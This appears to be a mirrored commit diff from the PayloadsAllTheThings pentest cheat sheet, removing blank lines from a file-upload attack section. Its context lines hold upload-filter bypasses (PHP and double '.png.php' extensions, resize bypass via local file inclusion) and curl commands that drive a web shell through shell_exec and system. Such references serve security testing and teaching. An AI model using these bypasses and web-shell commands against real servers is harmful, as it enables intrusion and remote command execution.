mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-03-01 15:03:12 -08:00
Methodo, SQL,RCE,XSS,XXE updated
This commit is contained in:
@@ -9,7 +9,6 @@ Reverse Shell
|
||||
Touch command
|
||||
```
|
||||
|
||||
|
||||
PHP Extension
|
||||
```
|
||||
.php
|
||||
@@ -25,7 +24,6 @@ Double extension
|
||||
.png.php
|
||||
```
|
||||
|
||||
|
||||
PNG Bypass a resize - Upload the picture and use a local file inclusion
|
||||
```
|
||||
You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute.
|
||||
@@ -33,7 +31,6 @@ curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'"
|
||||
curl 'http://localhost/test.php?0=system' --data "1='ls'"
|
||||
```
|
||||
|
||||
|
||||
JPG Bypass a resize - Upload the picture and use a local file inclusion
|
||||
```
|
||||
http://localhost/test.php?c=ls
|
||||
|
||||
Reference in New Issue
Block a user